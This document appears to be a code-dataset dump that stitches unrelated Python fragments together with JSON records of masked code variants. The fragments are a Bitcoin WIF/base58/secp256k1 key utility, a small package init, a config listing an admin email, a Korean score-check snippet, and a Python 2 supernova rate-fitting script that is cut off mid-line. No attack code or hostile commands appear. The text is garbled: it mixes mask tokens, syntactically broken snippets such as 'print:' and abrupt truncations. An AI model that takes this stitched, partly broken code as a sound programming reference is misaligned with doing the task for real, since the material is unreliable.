f_import_private(filename): file = open(filename, 'r') wif_key = file.read() file.close() key = from_WIF(wif_key) key_pair = k_box(string=key.hex()) return key_pair #%%: def from_WIF(wif_key): if not(len(wif_key) == 51): raise Exception("Bad len of WIF key") key = base58_decode(wif_key) checksum = key[-4:] key = key[1:33] if hashlib.sha256(hashlib.sha256(0x80.to_bytes(1,"big") + key).digest()).digest()[0:4] != checksum: raise Exception("Bad checksum") return key #%%: def uncompress_key(comp_key: bytearray): x = int.from_bytes(comp_key[1:], byteorder='big') is_even = True if comp_key[1] == '2' else False """ Derive y point from x point """ curve = ecdsa.SECP256k1.curve # The curve equation over F_p is: # y^2 = x^3 + ax + b a, b, p = curve.a(), curve.b(), curve.p() alpha = (pow(x, 3, p) + a * x + b) % p beta = ecdsa.numbertheory.square_root_mod_prime(alpha, p) if (beta % 2) == is_even: beta = p - beta return bytearray.fromhex( f"04{x:064x}{beta:064x}")
normal
{ "blob_id": "1ff2f06349ab1906a1649bdb83828fbdb3cf584f", "index": 4516, "step-1": "<mask token>\n\n\nclass k_box:\n\n def __init__(self, string=0, file=0):\n if string != 0:\n if not len(string) == 64:\n raise Exception('Bad len')\n self.__priv_key = bytes.fromhex(string)\n else:\n self.__priv_key = secrets.randbits(256).to_bytes(32, byteorder=\n byteorder)\n self.__pub_key = ecdsa.SigningKey.from_string(self.__priv_key,\n curve=ecdsa.SECP256k1).verifying_key.to_string()\n\n def get_secret_key(self):\n return self.__priv_key\n\n def get_public_key(self) ->bytearray:\n return (4).to_bytes(1, byteorder=byteorder) + self.__pub_key\n\n def get_public_key_compresed(self) ->bytearray:\n return (b'\\x03' if self.__pub_key[-1] % 2 else b'\\x02'\n ) + self.__pub_key[0:32]\n\n def get_address(self) ->str:\n e_pub = self.get_encrypted_pub_key()\n main_net_key = (0).to_bytes(1, byteorder=byteorder) + e_pub\n check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()\n ).digest()[:4]\n hex_addr = main_net_key + check_sum\n return base58_encode(hex_addr)\n\n def get_encrypted_pub_key(self):\n sha = hashlib.sha256(self.get_public_key_compresed()).digest()\n result = hashlib.new(name='ripemd160', data=sha).digest()\n return result\n\n def sign(self, message: bytes=0) ->bytearray:\n sk = ecdsa.SigningKey.from_string(self.__priv_key, curve=ecdsa.\n SECP256k1)\n return sk.sign(message)\n\n def verify(self, signature, message):\n vk = ecdsa.VerifyingKey.from_string(self.__pub_key, curve=ecdsa.\n SECP256k1)\n return vk.verify(signature, message.encode())\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass k_box:\n\n def __init__(self, string=0, file=0):\n if string != 0:\n if not len(string) == 64:\n raise Exception('Bad len')\n self.__priv_key = bytes.fromhex(string)\n else:\n self.__priv_key = secrets.randbits(256).to_bytes(32, byteorder=\n byteorder)\n self.__pub_key = ecdsa.SigningKey.from_string(self.__priv_key,\n curve=ecdsa.SECP256k1).verifying_key.to_string()\n\n def get_secret_key(self):\n return self.__priv_key\n\n def get_public_key(self) ->bytearray:\n return (4).to_bytes(1, byteorder=byteorder) + self.__pub_key\n\n def get_public_key_compresed(self) ->bytearray:\n return (b'\\x03' if self.__pub_key[-1] % 2 else b'\\x02'\n ) + self.__pub_key[0:32]\n\n def get_address(self) ->str:\n e_pub = self.get_encrypted_pub_key()\n main_net_key = (0).to_bytes(1, byteorder=byteorder) + e_pub\n check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()\n ).digest()[:4]\n hex_addr = main_net_key + check_sum\n return base58_encode(hex_addr)\n\n def get_encrypted_pub_key(self):\n sha = hashlib.sha256(self.get_public_key_compresed()).digest()\n result = hashlib.new(name='ripemd160', data=sha).digest()\n return result\n\n def sign(self, message: bytes=0) ->bytearray:\n sk = ecdsa.SigningKey.from_string(self.__priv_key, curve=ecdsa.\n SECP256k1)\n return sk.sign(message)\n\n def verify(self, signature, message):\n vk = ecdsa.VerifyingKey.from_string(self.__pub_key, curve=ecdsa.\n SECP256k1)\n return vk.verify(signature, message.encode())\n\n\n<mask token>\n\n\ndef base58_decode(s):\n \"\"\"Decode a base58-encoding string, returning bytes\"\"\"\n if not s:\n return b''\n alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'\n n = 0\n for c in s:\n n *= 58\n if c not in alphabet:\n raise Exception('Character %r is not a valid base58 character' % c)\n digit = alphabet.index(c)\n n += digit\n h = '%x' % n\n if len(h) % 2:\n h = '0' + h\n res = bytearray.fromhex(h)\n pad = 0\n for c in s[:-1]:\n if c == alphabet[0]:\n pad += 1\n else:\n break\n return b'\\x00' * pad + res\n\n\ndef to_WIF(key: str):\n if not len(key) == 64:\n raise Exception('Bad key len')\n key = '80' + key\n key_b = bytes.fromhex(key)\n sha_key1 = hashlib.sha256(hashlib.sha256(key_b).digest()).digest()\n key_b = key_b + sha_key1[0:4]\n return base58_encode(key_b)\n\n\n<mask token>\n\n\ndef from_WIF(wif_key):\n if not len(wif_key) == 51:\n raise Exception('Bad len of WIF key')\n key = base58_decode(wif_key)\n checksum = key[-4:]\n key = key[1:33]\n if hashlib.sha256(hashlib.sha256((128).to_bytes(1, 'big') + key).digest()\n ).digest()[0:4] != checksum:\n raise Exception('Bad checksum')\n return key\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass k_box:\n\n def __init__(self, string=0, file=0):\n if string != 0:\n if not len(string) == 64:\n raise Exception('Bad len')\n self.__priv_key = bytes.fromhex(string)\n else:\n self.__priv_key = secrets.randbits(256).to_bytes(32, byteorder=\n byteorder)\n self.__pub_key = ecdsa.SigningKey.from_string(self.__priv_key,\n curve=ecdsa.SECP256k1).verifying_key.to_string()\n\n def get_secret_key(self):\n return self.__priv_key\n\n def get_public_key(self) ->bytearray:\n return (4).to_bytes(1, byteorder=byteorder) + self.__pub_key\n\n def get_public_key_compresed(self) ->bytearray:\n return (b'\\x03' if self.__pub_key[-1] % 2 else b'\\x02'\n ) + self.__pub_key[0:32]\n\n def get_address(self) ->str:\n e_pub = self.get_encrypted_pub_key()\n main_net_key = (0).to_bytes(1, byteorder=byteorder) + e_pub\n check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()\n ).digest()[:4]\n hex_addr = main_net_key + check_sum\n return base58_encode(hex_addr)\n\n def get_encrypted_pub_key(self):\n sha = hashlib.sha256(self.get_public_key_compresed()).digest()\n result = hashlib.new(name='ripemd160', data=sha).digest()\n return result\n\n def sign(self, message: bytes=0) ->bytearray:\n sk = ecdsa.SigningKey.from_string(self.__priv_key, curve=ecdsa.\n SECP256k1)\n return sk.sign(message)\n\n def verify(self, signature, message):\n vk = ecdsa.VerifyingKey.from_string(self.__pub_key, curve=ecdsa.\n SECP256k1)\n return vk.verify(signature, message.encode())\n\n\ndef covert_to_address(pub_key: bytes) ->str:\n sha = hashlib.sha256(pub_key).digest()\n pub_key = hashlib.new(name='ripemd160', data=sha).digest()\n main_net_key = (0).to_bytes(1, byteorder=byteorder) + pub_key\n check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()).digest()[\n :4]\n hex_addr = main_net_key + check_sum\n return base58_encode(hex_addr)\n\n\ndef base58_encode(n: bytearray) ->str:\n alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'\n b58_string = ''\n leading_zeros = len(n.hex()) - len(n.hex().lstrip('0'))\n address_int = int.from_bytes(n, byteorder='big')\n while address_int > 0:\n digit = address_int % 58\n digit_char = alphabet[digit]\n b58_string = digit_char + b58_string\n address_int //= 58\n ones = leading_zeros // 2\n for one in range(ones):\n b58_string = '1' + b58_string\n return b58_string\n\n\ndef base58_decode(s):\n \"\"\"Decode a base58-encoding string, returning bytes\"\"\"\n if not s:\n return b''\n alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'\n n = 0\n for c in s:\n n *= 58\n if c not in alphabet:\n raise Exception('Character %r is not a valid base58 character' % c)\n digit = alphabet.index(c)\n n += digit\n h = '%x' % n\n if len(h) % 2:\n h = '0' + h\n res = bytearray.fromhex(h)\n pad = 0\n for c in s[:-1]:\n if c == alphabet[0]:\n pad += 1\n else:\n break\n return b'\\x00' * pad + res\n\n\ndef to_WIF(key: str):\n if not len(key) == 64:\n raise Exception('Bad key len')\n key = '80' + key\n key_b = bytes.fromhex(key)\n sha_key1 = hashlib.sha256(hashlib.sha256(key_b).digest()).digest()\n key_b = key_b + sha_key1[0:4]\n return base58_encode(key_b)\n\n\n<mask token>\n\n\ndef from_WIF(wif_key):\n if not len(wif_key) == 51:\n raise Exception('Bad len of WIF key')\n key = base58_decode(wif_key)\n checksum = key[-4:]\n key = key[1:33]\n if hashlib.sha256(hashlib.sha256((128).to_bytes(1, 'big') + key).digest()\n ).digest()[0:4] != checksum:\n raise Exception('Bad checksum')\n return key\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass k_box:\n\n def __init__(self, string=0, file=0):\n if string != 0:\n if not len(string) == 64:\n raise Exception('Bad len')\n self.__priv_key = bytes.fromhex(string)\n else:\n self.__priv_key = secrets.randbits(256).to_bytes(32, byteorder=\n byteorder)\n self.__pub_key = ecdsa.SigningKey.from_string(self.__priv_key,\n curve=ecdsa.SECP256k1).verifying_key.to_string()\n\n def get_secret_key(self):\n return self.__priv_key\n\n def get_public_key(self) ->bytearray:\n return (4).to_bytes(1, byteorder=byteorder) + self.__pub_key\n\n def get_public_key_compresed(self) ->bytearray:\n return (b'\\x03' if self.__pub_key[-1] % 2 else b'\\x02'\n ) + self.__pub_key[0:32]\n\n def get_address(self) ->str:\n e_pub = self.get_encrypted_pub_key()\n main_net_key = (0).to_bytes(1, byteorder=byteorder) + e_pub\n check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()\n ).digest()[:4]\n hex_addr = main_net_key + check_sum\n return base58_encode(hex_addr)\n\n def get_encrypted_pub_key(self):\n sha = hashlib.sha256(self.get_public_key_compresed()).digest()\n result = hashlib.new(name='ripemd160', data=sha).digest()\n return result\n\n def sign(self, message: bytes=0) ->bytearray:\n sk = ecdsa.SigningKey.from_string(self.__priv_key, curve=ecdsa.\n SECP256k1)\n return sk.sign(message)\n\n def verify(self, signature, message):\n vk = ecdsa.VerifyingKey.from_string(self.__pub_key, curve=ecdsa.\n SECP256k1)\n return vk.verify(signature, message.encode())\n\n\ndef covert_to_address(pub_key: bytes) ->str:\n sha = hashlib.sha256(pub_key).digest()\n pub_key = hashlib.new(name='ripemd160', data=sha).digest()\n main_net_key = (0).to_bytes(1, byteorder=byteorder) + pub_key\n check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()).digest()[\n :4]\n hex_addr = main_net_key + check_sum\n return base58_encode(hex_addr)\n\n\ndef base58_encode(n: bytearray) ->str:\n alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'\n b58_string = ''\n leading_zeros = len(n.hex()) - len(n.hex().lstrip('0'))\n address_int = int.from_bytes(n, byteorder='big')\n while address_int > 0:\n digit = address_int % 58\n digit_char = alphabet[digit]\n b58_string = digit_char + b58_string\n address_int //= 58\n ones = leading_zeros // 2\n for one in range(ones):\n b58_string = '1' + b58_string\n return b58_string\n\n\ndef base58_decode(s):\n \"\"\"Decode a base58-encoding string, returning bytes\"\"\"\n if not s:\n return b''\n alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'\n n = 0\n for c in s:\n n *= 58\n if c not in alphabet:\n raise Exception('Character %r is not a valid base58 character' % c)\n digit = alphabet.index(c)\n n += digit\n h = '%x' % n\n if len(h) % 2:\n h = '0' + h\n res = bytearray.fromhex(h)\n pad = 0\n for c in s[:-1]:\n if c == alphabet[0]:\n pad += 1\n else:\n break\n return b'\\x00' * pad + res\n\n\ndef to_WIF(key: str):\n if not len(key) == 64:\n raise Exception('Bad key len')\n key = '80' + key\n key_b = bytes.fromhex(key)\n sha_key1 = hashlib.sha256(hashlib.sha256(key_b).digest()).digest()\n key_b = key_b + sha_key1[0:4]\n return base58_encode(key_b)\n\n\ndef f_import_private(filename):\n file = open(filename, 'r')\n wif_key = file.read()\n file.close()\n key = from_WIF(wif_key)\n key_pair = k_box(string=key.hex())\n return key_pair\n\n\ndef from_WIF(wif_key):\n if not len(wif_key) == 51:\n raise Exception('Bad len of WIF key')\n key = base58_decode(wif_key)\n checksum = key[-4:]\n key = key[1:33]\n if hashlib.sha256(hashlib.sha256((128).to_bytes(1, 'big') + key).digest()\n ).digest()[0:4] != checksum:\n raise Exception('Bad checksum')\n return key\n\n\ndef uncompress_key(comp_key: bytearray):\n x = int.from_bytes(comp_key[1:], byteorder='big')\n is_even = True if comp_key[1] == '2' else False\n \"\"\" Derive y point from x point \"\"\"\n curve = ecdsa.SECP256k1.curve\n a, b, p = curve.a(), curve.b(), curve.p()\n alpha = (pow(x, 3, p) + a * x + b) % p\n beta = ecdsa.numbertheory.square_root_mod_prime(alpha, p)\n if beta % 2 == is_even:\n beta = p - beta\n return bytearray.fromhex(f'04{x:064x}{beta:064x}')\n", "step-5": "#!/usr/bin/env python\n# coding: utf-8\n\n#%%:\nimport secrets\nimport hashlib\nimport base64\nimport ecdsa\nfrom sys import byteorder\n\n\n#%%:\nclass k_box:\n def __init__(self, string = 0, file = 0):\n if string != 0:\n if not(len(string) == 64):\n raise Exception(\"Bad len\")\n self.__priv_key = bytes.fromhex(string)\n else:\n self.__priv_key = secrets.randbits(256).to_bytes(32,byteorder=byteorder)\n self.__pub_key = ecdsa.SigningKey.from_string(self.__priv_key, curve=ecdsa.SECP256k1).verifying_key.to_string()\n\n \n def get_secret_key(self):\n return self.__priv_key\n\n \n def get_public_key(self)->bytearray:\n return (0x04.to_bytes(1,byteorder=byteorder) + self.__pub_key)\n\n\n def get_public_key_compresed(self) -> bytearray:\n return (b'\\x03' if self.__pub_key[-1] % 2 else b'\\x02') + self.__pub_key[0:32]\n \n \n def get_address(self) -> str:\n e_pub = self.get_encrypted_pub_key()\n main_net_key = 0x00.to_bytes(1,byteorder=byteorder) + e_pub\n check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()).digest()[:4]\n hex_addr = main_net_key + check_sum\n return base58_encode(hex_addr)\n\n def get_encrypted_pub_key(self):\n sha = hashlib.sha256(self.get_public_key_compresed()).digest()\n result = hashlib.new(name='ripemd160', data=sha).digest() \n return result\n \n \n def sign(self, message:bytes = 0) -> bytearray:\n sk = ecdsa.SigningKey.from_string(self.__priv_key, curve=ecdsa.SECP256k1 )\n return sk.sign(message)\n\n \n def verify(self, signature, message):\n vk = ecdsa.VerifyingKey.from_string(self.__pub_key, curve=ecdsa.SECP256k1)\n return vk.verify(signature, message.encode()) \n \n\n\n#%%:\ndef covert_to_address(pub_key:bytes) -> str:\n sha = hashlib.sha256(pub_key).digest()\n pub_key = hashlib.new(name='ripemd160', data=sha).digest() \n main_net_key = 0x00.to_bytes(1,byteorder=byteorder) + pub_key\n check_sum = hashlib.sha256(hashlib.sha256(main_net_key).digest()).digest()[:4]\n hex_addr = main_net_key + check_sum\n return base58_encode(hex_addr)\n\n\n#%%:\ndef base58_encode(n:bytearray)->str:\n alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'\n b58_string = \"\"\n leading_zeros = len(n.hex()) - len(n.hex().lstrip('0')) # ! refactor counting zeros\n address_int = int.from_bytes(n,byteorder=\"big\")\n while address_int > 0:\n digit = address_int % 58\n digit_char = alphabet[digit]\n b58_string = digit_char + b58_string\n address_int //= 58\n ones = leading_zeros // 2\n for one in range(ones):\n b58_string = '1' + b58_string\n return b58_string\n\ndef base58_decode(s):\n \"\"\"Decode a base58-encoding string, returning bytes\"\"\"\n if not s:\n return b''\n alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'\n # Convert the string to an integer\n n = 0\n for c in s:\n n *= 58\n if c not in alphabet:\n raise Exception('Character %r is not a valid base58 character' % c)\n digit = alphabet.index(c)\n n += digit\n\n # Convert the integer to bytes\n h = '%x' % n\n if len(h) % 2:\n h = '0' + h\n # res = \"\"\n res = bytearray.fromhex(h)\n\n # Add padding back.\n pad = 0\n for c in s[:-1]:\n if c == alphabet[0]: pad += 1\n else: break\n return b'\\x00' * pad + res\n\n\n\n# def base58_decode(s:str, len):\n# alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'\n# result = 0\n# for c in s:\n# result = result * 58 + alphabet.index(c)\n# return bytearray.fromhex(f\"{result:0x}\".rjust(len * 2, '0'))\n\n# %%:\ndef to_WIF(key:str):\n if not(len(key) == 64):\n raise Exception(\"Bad key len\")\n key = \"80\" + key\n key_b = bytes.fromhex(key)\n sha_key1 = hashlib.sha256(hashlib.sha256(key_b).digest()).digest()\n key_b = key_b + sha_key1[0:4]\n return base58_encode(key_b)\n\n\ndef f_import_private(filename):\n file = open(filename, 'r')\n wif_key = file.read()\n file.close()\n key = from_WIF(wif_key)\n key_pair = k_box(string=key.hex())\n return key_pair\n\n\n#%%:\ndef from_WIF(wif_key):\n if not(len(wif_key) == 51):\n raise Exception(\"Bad len of WIF key\")\n key = base58_decode(wif_key)\n checksum = key[-4:]\n key = key[1:33]\n if hashlib.sha256(hashlib.sha256(0x80.to_bytes(1,\"big\") + key).digest()).digest()[0:4] != checksum:\n raise Exception(\"Bad checksum\")\n return key\n\n#%%:\n\ndef uncompress_key(comp_key: bytearray):\n x = int.from_bytes(comp_key[1:], byteorder='big')\n is_even = True if comp_key[1] == '2' else False\n \"\"\" Derive y point from x point \"\"\"\n curve = ecdsa.SECP256k1.curve\n # The curve equation over F_p is:\n # y^2 = x^3 + ax + b\n a, b, p = curve.a(), curve.b(), curve.p()\n alpha = (pow(x, 3, p) + a * x + b) % p\n beta = ecdsa.numbertheory.square_root_mod_prime(alpha, p)\n if (beta % 2) == is_even:\n beta = p - beta\n return bytearray.fromhex( f\"04{x:064x}{beta:064x}\")", "step-ids": [ 9, 12, 14, 16, 18 ] }
[ 9, 12, 14, 16, 18 ]
from .isearch import ISearcher __all__ = ['ISearcher']
normal
{ "blob_id": "13e2f474294edb7c78bd81456097d1389e6a0f1b", "index": 5003, "step-1": "<mask token>\n", "step-2": "<mask token>\n__all__ = ['ISearcher']\n", "step-3": "from .isearch import ISearcher\n__all__ = ['ISearcher']\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
DEBUG = True ADMINS = frozenset(["briandowe@gmail.com"])
normal
{ "blob_id": "68bade5767d4f418bcae07485a179df5e47e652c", "index": 9066, "step-1": "<mask token>\n", "step-2": "DEBUG = True\nADMINS = frozenset(['briandowe@gmail.com'])\n", "step-3": "DEBUG = True\nADMINS = frozenset([\"briandowe@gmail.com\"])", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
a = int(input('점수를 입력하세요')) if a >= 70 : print:('통과입니다.') print:('축하합니다.') else : print:('불합격입니다.') print("안녕")
normal
{ "blob_id": "f8d0cc9cb0e5f8adf9077ffb39dd6abedfedaa12", "index": 5427, "step-1": "<mask token>\n", "step-2": "<mask token>\nif a >= 70:\n print: '통과입니다.'\n print: '축하합니다.'\nelse:\n print: '불합격입니다.'\nprint('안녕')\n", "step-3": "a = int(input('점수를 입력하세요'))\nif a >= 70:\n print: '통과입니다.'\n print: '축하합니다.'\nelse:\n print: '불합격입니다.'\nprint('안녕')\n", "step-4": "a = int(input('점수를 입력하세요'))\r\nif a >= 70 :\r\n print:('통과입니다.')\r\n print:('축하합니다.')\r\nelse :\r\n print:('불합격입니다.')\r\nprint(\"안녕\")\r\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/software/python-2.7-2014q3-el6-x86_64/bin/python import SNANA_Reader as simread import REAL_Reader as dataread #import astropy.cosmology as cosmo import traceback import scipy import scipy.stats as stats import numpy as np import matplotlib.pyplot as plt plt.switch_backend('Agg') #import Cosmology import scipy.stats.mstats as mstats import scipy.stats as stats from scipy.interpolate import UnivariateSpline from sys import argv import glob import time import os import gzip import shutil import numpy.ma as ma import subprocess import iminuit as iM from iminuit import Minuit as M from discreteChi2Func import discreteChi2Func as chi2func import pandas as pd class Rate_Fitter: def __init__(self, realfilename, realName, simfilename, simName, simgenfilename, MCBeta, MCK, zminSamp=0.1, zmaxSamp=1.20 , zminFit = 0.1, zmaxFit = 1.20, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, Rate_Model = 'powerlaw', cheatType = False, cheatZ = False, cheatCCSub = False, cheatCCScale = False, cuts = None, nprint = 5, MURESCuts = None, noCCMC = False, priorRate = None, priorZEff = None, ratePriorErrUp = None, ratePriorErrDown =None, ratePriorErrAll = None, fixCCScale = False): print "Rate_Fitter" print "np version {0}".format(np.__version__) self.zminSamp = zminSamp self.zmaxSamp = zmaxSamp self.zminFit = zminFit self.zmaxFit = zmaxFit self.MCBeta = MCBeta self.MCK = MCK self.Rate_Model = Rate_Model self.cheatType = cheatType self.cheatZ = cheatZ self.cheatCCSub = cheatCCSub self.cheatCCScale = cheatCCScale self.cuts = cuts self.nprint = nprint self.MURESCuts = MURESCuts self.priorRate = priorRate self.priorZEff = priorZEff self.ratePriorErrUp = ratePriorErrUp self.ratePriorErrDown = ratePriorErrDown self.ratePriorErrAll = ratePriorErrAll self.fixCCScale = fixCCScale #print "PRIORS" #print priorRate #print priorZEff #print ratePriorErrUp #print ratePriorErrDown if self.cheatZ: self.ztype = 'SIM_ZCMB' else: #self.ztype = 'zHD' self.ztype = 'zPHOT' self.shiftFlagData = False self.shiftFlagSim = False self.globalChi2Storage = [] self.globalNDataStorage = [] ''' self.globalZPhotBinStorage = [] self.globalNDataIaPhotBinStorage = [] self.globalNDataCCPhotBinStorage = [] self.globalZTrueBinStorage = [] self.globalNDataIaTrueBinStorage = [] self.globalNDataCCTrueBinStorage = [] ''' print 'a' try: self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95) except: try: self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 5) except: self.simcat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6) print 'b' self.simName = simName self.simgencat = simread.SNANA_Cat(simfilename, simName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95) print 'c' try: #with np.load(simgenfilename+'.npz', allow_pickle = True) as data0: # SIMGEN = data0['a'] SIMGEN = np.load(simgenfilename + '.npy', allow_pickle = True) except: SIMGEN = np.genfromtxt(simgenfilename, dtype=None, names = True, skip_footer=3, invalid_raise=False) print "Compress save A" SIMGEN.dtype.names = map(str, SIMGEN.dtype.names) #np.savez_compressed(simgenfilename+'.npz', a = SIMGEN) np.save(simgenfilename+'.npy', SIMGEN) print "WHY DO YOU HATE ME WHEN I SHOW YOU NOTHING BUT LOVE" print simgenfilename #SIMGEN = pd.read_csv(simgenfilename, delim_whitespace=True, comment="#").to_records(index = False) print 'd' SIMGEN = SIMGEN[SIMGEN['GENZ'] != 'GENZ'] self.simgencat.params = {'flat':True, 'H0': simH0, 'Om0':simOmegaM, 'Ob0': simOb0, 'sigma8': simSigma8, 'ns': simNs} #self.simgencat.cosmo = Cosmology.setCosmology('simCosmo', self.simcat.params) self.simgencat.OrigCatalog = np.copy(SIMGEN) self.simgencat.Catalog = np.copy(SIMGEN) self.simgencat.Catalog = self.simgencat.Catalog[self.simgencat.Catalog['GENZ'] != 'GENZ'] self.simgencat.simname = simName self.simgencat.NSN = self.simgencat.Catalog['GENZ'].shape[2] print "SIMGEN NUMBER" print self.simgencat.NSN print "TEST2" print self.simgencat.Catalog['GENZ'].shape[0] print self.simgencat.Catalog['GENZ'].shape[1] print self.simgencat.Catalog['GENZ'].shape[2] print "SIMGENCAT FILE" print simfilename self.realName = realName try: print 'q' self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6) except: #self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95) try: print 'r' self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95) except: print 's' self.realcat = dataread.REAL_Cat(realfilename, realName, skip_header =11 ) if self.cheatType: print "WARNING, THE FITTER IS CHEATING AND ELIMINATED NON-IAs USING SIM INFO" self.realcat.Catalog = self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1] self.simcat.Catalog = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1] print "Pre cut Catalog" print self.realcat.Catalog.shape for cut in cuts: print 'a' print cut print self.realcat.Catalog.shape self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.realcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])] self.simcat.Catalog = self.simcat.Catalog[(self.simcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.simcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])] print 'b' print cut print self.realcat.Catalog.shape self.postCutRealCat = np.copy(self.realcat.Catalog) self.postCutSimCat = np.copy(self.simcat.Catalog) self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)] self.simcat.Catalog = self.simcat.Catalog[(self.simcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.simcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)] print 'zCut Pre MURESCut' print np.sum((self.realcat.Catalog[self.ztype].astype(float) > self.zminFit) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxFit)) print 'MURESCUT' print self.MURESCuts print self.realcat.Catalog.shape if not (self.MURESCuts is None): ''' #MURES Cut format: (zmin, zmax, neg Cut, pos Cut) for mc in self.MURESCuts: realCond = (self.realcat.Catalog[self.ztype] < mc[0]) | (self.realcat.Catalog[self.ztype] > mc[1])| ((self.realcat.Catalog['MURES'] > mc[2])& (self.realcat.Catalog['MURES'] < mc[3])) simCond = (self.simcat.Catalog[self.ztype] < mc[0]) | (self.simcat.Catalog[self.ztype] > mc[1])| ((self.simcat.Catalog['MURES'] > mc[2])& (self.simcat.Catalog['MURES'] < mc[3])) self.realcat.Catalog = self.realcat.Catalog[realCond] self.simcat.Catalog = self.simcat.Catalog[simCond] ''' self.realcat.Catalog = self.realcat.Catalog[ np.abs( self.realcat.Catalog['MURES'] * 1.0 / self.realcat.Catalog['MUERR'] ) < MURESCuts] self.simcat.Catalog = self.simcat.Catalog[ np.abs( self.simcat.Catalog['MURES'] * 1.0 / self.simcat.Catalog['MUERR'] ) < MURESCuts] print "PostMURESCut Shape" print self.realcat.Catalog.shape print 'zCut Post MURESCut' print np.sum((self.realcat.Catalog[self.ztype].astype(float) > self.zminFit) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxFit)) print "Post cut Catalog" print self.realcat.Catalog.shape if noCCMC: self.simgencat.Catalog = self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'] == 1] self.simcat.Catalog = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1] def newData(self, realfilename, realName, simInd =100): self.realName = realName self.shiftFlagData = False try: self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95) except: self.realcat = simread.SNANA_Cat(realfilename, realName, simOmegaM=0.3, simOmegaL=0.7, simH0=70.0, simw=-1.0, simOb0=0.049, simSigma8=0.81, simNs=0.95, skip_header = 6 ) if self.cheatType: print "WARNING, THE FITTER IS CHEATING AND ELIMINATED NON-IAs USING SIM INFO" self.realcat.Catalog = self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1] if simInd < self.nprint: print 'N precuts' print self.realcat.Catalog['FITPROB'].shape print "Pre cut Catalog" print self.realcat.Catalog.shape for cut in cuts: self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[cut[0]].astype(type(cut[1])) > cut[1]) & (self.realcat.Catalog[cut[0]].astype(type(cut[2])) < cut[2])] self.realcat.Catalog = self.realcat.Catalog[(self.realcat.Catalog[self.ztype].astype(float) > self.zminSamp) & (self.realcat.Catalog[self.ztype].astype(float) < self.zmaxSamp)] print "Post cut Catalog" print self.realcat.Catalog.shape self.postCutRealCat = np.copy(self.realcat.Catalog) print 'MURESCUT' print self.MURESCuts print self.realcat.Catalog.shape if not (self.MURESCuts is None): #MURES Cut format: (zmin, zmax, neg Cut, pos Cut) ''' for mc in self.MURESCuts: realCond = (self.realcat.Catalog[self.ztype] < mc[0]) | (self.realcat.Catalog[self.ztype] > mc[1])| ((self.realcat.Catalog['MURES'] > mc[2])& (self.realcat.Catalog['MURES'] < 